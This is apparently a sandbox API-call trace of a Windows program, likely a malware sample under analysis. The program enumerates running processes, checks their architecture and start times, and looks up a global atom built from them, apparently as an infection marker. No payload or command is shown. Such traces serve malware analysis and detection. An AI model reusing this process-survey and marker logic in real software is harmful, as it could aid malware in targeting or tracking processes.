	[0096.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.291] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.291] CloseHandle (hObject=0x248) returned 1
	[0096.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.291] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.291] CloseHandle (hObject=0x248) returned 1
	[0096.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658970, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.291] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.291] CloseHandle (hObject=0x248) returned 1
	[0096.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.292] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.292] CloseHandle (hObject=0x248) returned 1
	[0096.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.292] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.292] CloseHandle (hObject=0x248) returned 1
	[0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.293] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.293] CloseHandle (hObject=0x248) returned 1
	[0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.293] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.293] CloseHandle (hObject=0x248) returned 1
	[0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658f08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.294] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.294] CloseHandle (hObject=0x248) returned 1
	[0096.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.294] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.294] CloseHandle (hObject=0x248) returned 1
	[0096.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.295] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.295] CloseHandle (hObject=0x248) returned 1
	[0096.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.295] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetLastError () returned 0x5
	[0096.296] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.297] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.297] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] GetLastError () returned 0x5
	[0096.297] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.298] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetLastError () returned 0x5
	[0096.299] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.300] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.300] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.300] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.300] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.300] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.300] CloseHandle (hObject=0x248) returned 1
	[0096.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.301] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.301] CloseHandle (hObject=0x248) returned 1
	[0096.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65adf8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.301] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.301] CloseHandle (hObject=0x248) returned 1
	[0096.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.344] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.350] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.350] CloseHandle (hObject=0x248) returned 1
	[0096.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.350] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.350] CloseHandle (hObject=0x248) returned 1
	[0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658d48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.351] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.351] CloseHandle (hObject=0x248) returned 1
	[0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.351] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.351] CloseHandle (hObject=0x248) returned 1
	[0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.352] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.352] CloseHandle (hObject=0x248) returned 1
	[0096.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.352] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.352] CloseHandle (hObject=0x248) returned 1
